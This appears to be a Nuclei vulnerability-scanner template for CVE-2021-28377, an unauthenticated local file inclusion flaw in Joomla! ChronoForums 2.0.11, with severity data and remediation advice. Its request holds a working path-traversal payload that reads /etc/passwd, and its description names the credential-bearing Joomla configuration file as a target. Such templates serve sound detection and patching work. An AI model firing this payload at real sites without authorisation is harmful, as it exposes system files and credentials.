42 lines
1.6 KiB
YAML
42 lines
1.6 KiB
YAML
id: CVE-2021-28377
|
|
|
|
info:
|
|
name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
|
|
remediation: |
|
|
Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.
|
|
reference:
|
|
- https://herolab.usd.de/en/security-advisories/usd-2021-0007/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-28377
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-28377
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00106
|
|
epss-percentile: 0.42771
|
|
cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: chronoengine
|
|
product: chronoforums
|
|
framework: joomla
|
|
tags: cve,cve2021,chronoforums,lfi,joomla,chronoengine
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022065a68a962732b3e4af57c2b5916d36d1b8ce4d724cf2f49415ca5f84f9a40151022062976a82715ec649baf5ff7581238d243585f3ff7addf9851519815f841f42dd:922c64590222798bb761d5b6d8e72950 |